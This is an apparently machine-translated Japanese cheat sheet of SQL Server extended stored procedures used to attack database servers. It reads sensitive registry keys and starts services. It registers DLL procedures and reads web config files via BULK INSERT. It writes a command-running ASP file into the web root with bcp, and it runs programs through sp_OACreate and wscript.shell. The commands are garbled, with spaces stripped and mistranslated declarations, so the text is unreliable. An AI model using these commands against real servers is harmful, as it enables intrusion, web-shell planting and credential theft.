一部のSQL拡張機能
xp_regaddmultistring
XP_REGDELETEKEYキー名を削除します
xp_regdeletevaluateキー値
xp_regenumkeys enum
xp_regenumvalues
xp_regread for
xp_regremovemultistring
xp_regwrite書き込み
xp_availablemediaビュードライブ
xp_dirrtreeビューディレクトリ
XP_ENUMDSNODBCデータソース
XP_LOGINCONFIGサーバーセキュリティ構成に関する情報
XP_MAKECABパッケージでは、最初にDBO許可を使用できます
XP_NTSEC_ENUMDOMAINS ENUMドメイン名関連情報
xp_terminate_processターミナルプロセスとIP
XP_LOGININFO現在ログインアカウント
sp_configureデータベース内のコンテンツを取得します(これは非常に便利だと思います)
sp_helpextendedprocはすべてのストレージ拡張機能を取得します
SP_WHO2クエリユーザー、ログインするホスト、データベースで実行する操作など。
いくつかのネットワーク情報
execxp_regreadhkey_local_machine、
'System/CurrentControlset/Services/Lanmanserver/Parameters」、
「nullsessionshares」
SNMPアシストネットワークの精査
execxp_regenumvalueshkey_local_machine、
'System/CurrentControlset/services/snmp/parameters/validcomm
ユニット
Telnetなどのシステムサービスを開始すると、管理者やシステムパスワードに来ることができます。
execmaster..xp_servicecontrol'start '、「スケジュール」
execmaster..xp_servicecontrol'start '、' server '
sp_addextendedproc'xp_webserver '、' c:/temp/xp_foo.dll 'この拡張子はプログラムを実行できます
「bulkinsert」構文を使用して、テキストファイルを一時テーブルに挿入します。このテーブルを作成するだけです:
createTableFoo(LineVarchar(8000))
次に、bulkinsert操作を実行して、ファイルにデータをテーブルに挿入します。
bulkinsertfoofrom'c:/inetpub/wwwroot/admin/inc.asp '
bcp "select*fromtext..foo" queryoutc:/inetpub/wwwroot/runcommand.asp – c-slocalhost – usa – pfoobar
「s」パラメーターはクエリを実行するサーバー、「u」パラメーターはユーザー名、「p」パラメーターはパスワード、ここに「foobar」です。
SqlServerで、ActiveX自動スクリプトの作成を可能にするいくつかの組み込みストアドプロシージャが提供されています。これらのスクリプトは、WindowsスクリプトインタープリターまたはASPスクリプトプログラムの下で実行されているスクリプトと同じです。VBScriptまたはJavaScriptを使用して作成および対話します。このメソッドを使用した自動実行スクリプトは、ASPスクリプトまたはWSHスクリプトのTransact-SQLで何でもできます。
「wscript.shell」オブジェクトを使用して、メモ帳のインスタンスを作成します。
@ointを宣言します
execsp_oacreate'wscript.shell '、@oout
execsp_oamethod@o、 'run'、null、 'notepad.exe'
ユーザー名の後に実行するように指定します。